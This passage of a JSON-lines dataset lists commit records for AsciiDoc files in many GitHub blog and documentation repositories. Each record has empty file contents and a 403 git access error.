2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77305c72717b5ade5a48ff7bfb4f569220516bb5","subject":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","message":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17bdbeaa623e29cdd3e4e2760c87a4d14fca7881","subject":"y2b create post BLACK OPS 2 MIDNIGHT LAUNCH!","message":"y2b create post BLACK OPS 2 MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-12-BLACK-OPS-2-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2012-11-12-BLACK-OPS-2-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dae1b99fad4396139bbb0cbc83ea896ab3167f3","subject":"Update 2015-07-10-Partially-Applied-Functions.adoc","message":"Update 2015-07-10-Partially-Applied-Functions.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-07-10-Partially-Applied-Functions.adoc","new_file":"_posts\/2015-07-10-Partially-Applied-Functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8119c26ff990089c0f828102654b2781c04db6c3","subject":"Update 2015-10-22-Arraylist-vs-Vector-in-Java.adoc","message":"Update 2015-10-22-Arraylist-vs-Vector-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-22-Arraylist-vs-Vector-in-Java.adoc","new_file":"_posts\/2015-10-22-Arraylist-vs-Vector-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9780e4e9fd0577255dd4a4c5629c1e1c2a2df5fd","subject":"Update 2016-03-12-Believe-in-Your-Own-Madness.adoc","message":"Update 2016-03-12-Believe-in-Your-Own-Madness.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Believe-in-Your-Own-Madness.adoc","new_file":"_posts\/2016-03-12-Believe-in-Your-Own-Madness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52e2ab2c5bed297a0b885ecd90c9d725bfef2ffe","subject":"y2b create post They Said It Can't Be Ripped...","message":"y2b create post They Said It Can't Be Ripped...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-06-They-Said-It-Cant-Be-Ripped.adoc","new_file":"_posts\/2016-08-06-They-Said-It-Cant-Be-Ripped.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8287f6aa7ea7d258ce060e9c1b32d81ff8ee6b","subject":"y2b create post The Mind-Blowing $600 Earbuds","message":"y2b create post The Mind-Blowing $600 Earbuds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-07-The-MindBlowing-600-Earbuds.adoc","new_file":"_posts\/2017-03-07-The-MindBlowing-600-Earbuds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ceedfd6b8bf42b70a67a00d96a8b5e464c147be","subject":"DBZ-3695 Community newsletter 01\/2021","message":"DBZ-3695 Community newsletter 01\/2021\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-07-07-debezium-newsletter-01-2021.adoc","new_file":"_posts\/2021-07-07-debezium-newsletter-01-2021.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acee71c509d0315dd46f6108da2a16a65c9bddc","subject":"CL - changing current working directory","message":"CL - changing current working directory\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d3e10bba92643dc02c14a1169d00ecabe76bfaaa","subject":"Add RPM signing documentation.","message":"Add RPM signing documentation.\n","repos":"google\/grr-doc","old_file":"linuxclient.adoc","new_file":"linuxclient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ef00596c958487d6c088b6f4c41fc014f135658","subject":"Added links to Meyers'\/Sutter's books","message":"Added links to Meyers'\/Sutter's books","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31d3c8c44a293b56c82ff070cb9b705ae50760d6","subject":"Update 2016-02-26-GO-ing-forward.adoc","message":"Update 2016-02-26-GO-ing-forward.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-02-26-GO-ing-forward.adoc","new_file":"_posts\/2016-02-26-GO-ing-forward.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d483c08751f1351ede0ac2220ed11b508433ee1e","subject":"Update 2016-09-13-Funding.adoc","message":"Update 2016-09-13-Funding.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-13-Funding.adoc","new_file":"_posts\/2016-09-13-Funding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca5c1e1b7deeed50a16655c9ba2037b436dffad2","subject":"Renamed '_posts\/2019-09-29-DB-tips.adoc' to '_posts\/2017-09-29-DB-tips.adoc'","message":"Renamed '_posts\/2019-09-29-DB-tips.adoc' to '_posts\/2017-09-29-DB-tips.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-09-29-DB-tips.adoc","new_file":"_posts\/2017-09-29-DB-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ffdfb071a557075ca87c5116e09d160df2d583","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80095c19ecff65bc1a598385d111ab9add02eb98","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d42845df53bd0065909b715c8718506aa702dfaa","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509d5d01f7f6181d7c9ca6ad15c37a1797141cf4","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"120b53a52f46b85fd5127d633f9fc4af3e63d867","subject":"Update 2018-09-04-Some-Java-oddities.adoc","message":"Update 2018-09-04-Some-Java-oddities.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09cca17d6bb83d9d4f766f35ca923b3200ca8715","subject":"update documentation","message":"update documentation\n","repos":"robertoschwald\/grails-audit-logging-plugin,tkvw\/grails-audit-logging-plugin","old_file":"audit-logging\/src\/docs\/changelog.adoc","new_file":"audit-logging\/src\/docs\/changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robertoschwald\/grails-audit-logging-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8740350cea190e25eea0e0684dfe93ff93d72e23","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcfc93cd01c57d88b2fa64c60a71873e771d73b0","subject":"Update 2015-10-18-Hello-World.adoc","message":"Update 2015-10-18-Hello-World.adoc","repos":"booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io,booleanbalaji\/hubpress.io","old_file":"_posts\/2015-10-18-Hello-World.adoc","new_file":"_posts\/2015-10-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/booleanbalaji\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f04bdf80b972c3df8ba5d6fe40d08fdbfb0552a6","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49d3c2b5e102defebf137657971822649613df59","subject":"y2b create post This Face Will Eat Your Money...","message":"y2b create post This Face Will Eat Your Money...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-24-This-Face-Will-Eat-Your-Money.adoc","new_file":"_posts\/2016-10-24-This-Face-Will-Eat-Your-Money.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1351a485721035361260628a56cf2e497bc8b045","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dac381a45433fb10096d4eb68d7a36644416ec97","subject":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","message":"Update 2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_file":"_posts\/2014-07-25-Probleme-de-background-dans-le-theme-Dark-dEclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f0d778e0c14863e95ebdc9c772e604552b4a74e","subject":"Added yubikey-piv-manager to software list","message":"Added yubikey-piv-manager to software list","repos":"akgood\/yubico-piv-tool,ato\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e9691b856a879923bf48b46c122430ae13166b50","subject":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","message":"Update 2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_file":"_posts\/2017-07-22-Date-and-Time-understanding-how-to-use-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d7c69f61bffb89784e1bbc7b7cbbc5c5b50aab0","subject":"documentation","message":"documentation\n","repos":"evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server,evandor\/skysail-server","old_file":"src\/docs\/asciidoc\/history.adoc","new_file":"src\/docs\/asciidoc\/history.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evandor\/skysail-server.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6cc2b0c0ee99459777e6ffc78b848072cff8051","subject":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","message":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a8699ee17bba551153c065ec7f579a54ad82f95","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a993415c6efdf22e37ceba63763d7d8c2c47104b","subject":"Update 2016-09-16-Deep-Language-Modeling-Part-II.adoc","message":"Update 2016-09-16-Deep-Language-Modeling-Part-II.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-16-Deep-Language-Modeling-Part-II.adoc","new_file":"_posts\/2016-09-16-Deep-Language-Modeling-Part-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a55b7ec139c852fcea874380e316453fc74ee4d1","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee015bbc96c59329f518957a24affb2f7bd8c4f","subject":"Update 2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","message":"Update 2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","new_file":"_posts\/2009-12-08-Sony-MDR-EX90SL-Headphone-Bass-Port-Mod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b2e936efa4b3d34f3b854027ed1654520d5b4ec","subject":"y2b create post Speaker Made Of Cardboard - Does It Suck?","message":"y2b create post Speaker Made Of Cardboard - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-19-Speaker-Made-Of-Cardboard--Does-It-Suck.adoc","new_file":"_posts\/2016-09-19-Speaker-Made-Of-Cardboard--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96e3984c8d208f298eba1f318d31f364fa5a304","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3be3e42b8dd957d388e33a68243ae5d605f4724e","subject":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","message":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f17d00ae3eeb61c7194d3464bdc490f201fb6934","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35c65ac663032c7d19a8512423eab458a850aad4","subject":"Update 2015-01-31-Tendencias.adoc","message":"Update 2015-01-31-Tendencias.adoc","repos":"pavistalli\/pavistalli.github.io,pavistalli\/pavistalli.github.io,pavistalli\/pavistalli.github.io","old_file":"_posts\/2015-01-31-Tendencias.adoc","new_file":"_posts\/2015-01-31-Tendencias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pavistalli\/pavistalli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e35db3b0d69536fb0b99738a883ed8f3d401543","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"870b96bf01c3b537c10f672e8fa33d02148f283b","subject":"Update 2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","message":"Update 2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","new_file":"_posts\/2016-07-08-Testing-different-parameters-for-the-engine-and-data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"252d8f013d0bdb9e68aea14554cdb57e037a3ad4","subject":"Update 2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","message":"Update 2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","repos":"Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io","old_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","new_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-fichier-ics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Astalaseven\/astalaseven.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e636652dc227e49411846e1cd6ab8c657f1b1bd5","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2625e66e0ad497c094ae894abe2fb39cd8cd7485","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74a81ec3210bacadc3904b208c01eae642c3f222","subject":"Added Camel 2.17.6 release notes to docs","message":"Added 